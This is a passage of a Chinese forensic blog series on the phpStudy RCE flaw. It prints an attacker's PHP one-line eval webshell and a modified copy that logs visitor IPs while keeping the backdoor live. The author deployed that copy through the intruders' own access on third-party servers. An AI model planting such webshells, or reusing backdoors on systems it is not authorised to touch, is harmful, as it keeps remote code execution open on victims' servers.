phpStudy远程RCE漏洞复现以及沦陷主机入侵溯源分析(4)

(8)上面在9月23日写入webshell一句话后，大黑客又通过一句话木马webshell上传了一个文件名为“001122.php”的webshell不死马基本可以先贴个标签是同一个大黑客的攻击入侵行为，在这里也可以看出phpstudy一键部署应该把phpmyadmin的默认密码给修改成随机字符串，此前就有安全团队针对此问题被黑产批量getshell的活动进行了分析。

(1)我们现在已经拿到了那些黑客的的webshell一句话后门文件现在就要开始溯源黑客的IP地址，emmmmm，由于我不能直接登录受感染的主机查看访问日志文件，那么这就会非常的尴尬，但是我突然想起了之前我之前给广东省某市的网络执法机构做了一个用来记录黑客访问webshell一句话时候的IP地址的脚本，并且通过邮件或者微信把信息发送给执法人。

(2)但是在检测之前我需要对他们的webshell一句话木马做一下加工处理，黑客原先留下的webshell代码如下:

<?php

@eval($_POST[ppass]);

?>

(3)我们加工处理黑客留下的后的webshell代码如下

<?php

$address = $_SERVER['REMOTE_ADDR'];

$referer = $_SERVER['HTTP_REFERER'];

$browser = $_SERVER['HTTP_USER_AGENT'];

$file = fopen("log.html",  "a");  

$time = time();

$now_date= date('Y-m-d H:i:s',$time);

fwrite( $file, "<b>Time:$now_date</b><br>" );

fwrite( $file, "<b>IP Address:$address</b><br>");

fwrite( $file, "<b>Referer:$referer</b><br>");  

fwrite( $file, "<b>Browser:$browser</b><br/><hr>");  

fclose($file);

@eval($_POST[ppass]);

?>

(4)log.html的路径地址可以修改到存放到网站根目录下的其他文件下，避免被发现哈哈哈，

当黑客使用中国菜刀/中国蚁剑访问webshell的时候就会记录下IP地址/访问时间/请求头等信息到log.html文件中

(5)模拟黑客访问webshell前

(6)模拟黑客访问websell后

(7)然后本地或者VPS上定时访问请求log.html把最新的访问信息通过Email邮件的方式发送给执法机关/溯源工程师，

(8)访问检测已经可以达到了秒级，时间的精度也是非常之高。然后就给全部黑客的webshell加工一下，然后我们在调用本地的脚本使用一个并发的请求去请求所有的站点log.html静静等待邮件即可。但是这里并不建议并发请求容易被防火墙封锁IP，所以我就使用了单线线程模式并且使用tiime模块的time.sleep设置了请求延迟，我设置了10秒访问一次。

(9)设置完毕之后就可以直接运行监听脚本了

(10)在经过十多个小时的等待,我终于等待到了那些大黑客重新访问他们预留下来的Webshell地址了，手机QQ邮箱也收到了邮件通知